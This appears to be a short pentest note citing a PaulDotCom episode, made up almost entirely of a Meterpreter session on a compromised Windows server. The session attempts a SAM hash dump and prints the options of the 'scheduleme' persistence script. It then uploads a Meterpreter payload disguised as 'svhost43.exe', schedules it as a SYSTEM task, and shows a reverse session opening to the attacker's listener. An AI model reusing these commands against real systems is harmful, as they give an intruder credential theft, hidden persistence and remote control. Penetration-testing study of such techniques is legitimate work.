metasploit into a scheduled process
http://pauldotcom.com/wiki/index.php/Episode153
meterpreter > use priv
Loading extension priv...success.
meterpreter > getuid
Server username: WIN2K8\Administrator
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: 87
meterpreter > run scheduleme -h
Scheduleme Meterpreter Script
This script provides most common scheduling types used during a pentest.
It has the functionality to upload a desired executable or script and schedule
the file uploaded. All scheduled task are as System so Meterpreter process must
be System or local admin for local schedules and Administrator for remore shcedules
-h Help menu.
-cCommand to execute at the given time. If options for execution needed use double quotes
-d Daily.
-hrEvery specified hours 1-23.
-mEvery specified amount of minutes 1-1439
-l When a user logs on.
-s At system startup.
-i Run command imediatly and only once.
-r Remote Schedule. Executable has to be already on remote target
-eExecutable or script to upload to target host, will not work with remote schedule
-oOptions for executable when upload method used
-u Username of account with administrative privelages.
-p Password for account provided.
-tRemote system to schedule job.
meterpreter > run scheduleme -e ./meterpreter.exe -i
[*] Uploadingd ./meterpreter.exe....
[*] ./meterpreter.exe uploaded!
[*] Scheduling command C:\Users\ADMINI~1\AppData\Local\Temp\svhost43.exe to run now.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck80 /F
meterpreter >
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (192.168.1.184:4444 -> 192.168.1.138:54783)